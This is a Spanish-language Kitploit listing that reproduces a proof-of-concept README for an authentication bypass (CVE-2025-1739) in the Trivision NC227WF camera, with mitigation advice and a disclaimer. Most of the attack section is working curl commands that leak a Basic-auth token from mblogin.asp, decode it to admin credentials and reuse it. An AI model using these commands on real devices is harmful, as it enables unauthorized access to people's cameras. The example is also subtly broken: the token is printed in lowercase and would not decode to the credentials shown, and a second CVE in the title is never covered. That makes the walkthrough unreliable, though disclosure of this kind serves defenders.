Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/n0n4m3x41/cve-2025-1739
Authentication & AuthorizationEmbedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationLearning & Education
GitHubn0n4m3x41/cve-2025-1739

CVE-2025-1739

0day PoC for CVE-2025-1739

Ver Repositorio
hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-1738 & CVE-2025-1739 — PoC de la Cámara Trivision NC227WF

📋 Resumen

CVECVSS v3.1PuntuaciónCWETipo
CVE-2025-1739AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N7.1CWE-288Omisión de autenticación mediante fuga de autenticación básica

🔓 CVE-2025-1739 — Exposición de código de autenticación básica / Omisión de autenticación (CWE-288)

Descripción

La cámara filtra un token de autenticación básica codificado en Base64 válido a través del endpoint mblogin.asp. Este token se puede decodificar y reutilizar trivialmente para obtener acceso no autorizado al dispositivo — no se requiere conocimiento de la contraseña.

  • Vector de ataque: Red adyacente (AV:A)
  • Puntuación CVSS: 7.1
  • CWE: CWE-288 (Omisión de autenticación mediante una ruta o canal alternativo)

Carga útil

root@kitploit:~
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/mobile/mblogin.asp
image

Ejemplo de respuesta

La respuesta contiene un token de autenticación básica válido:

root@kitploit:~
ywrtaw46vw5ndwvzc2fibguxmjmh

Decodificación del token

root@kitploit:~
echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d
# Output: admin:unguessable123!

Reutilización del token

root@kitploit:~
curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://<CAMERA_IP>:<PORT>/

🛡️ Mitigación

  • Actualice el firmware si hay una versión parcheada disponible de Trivision.
  • Aísle la cámara en una VLAN dedicada sin acceso externo.
  • Proteja con firewall el puerto de administración de la cámara de segmentos de red no confiables.
  • Cambie las credenciales predeterminadas y rote las contraseñas regularmente.
  • Monitoree accesos inesperados a activex_pal.asp y mblogin.asp.

⚖️ Descargo de responsabilidad

Este repositorio es solo para investigación de seguridad educativa y autorizada. Los autores no son responsables por ningún uso indebido. Siempre obtenga permiso explícito antes de probar cualquier dispositivo.

Descargar herramienta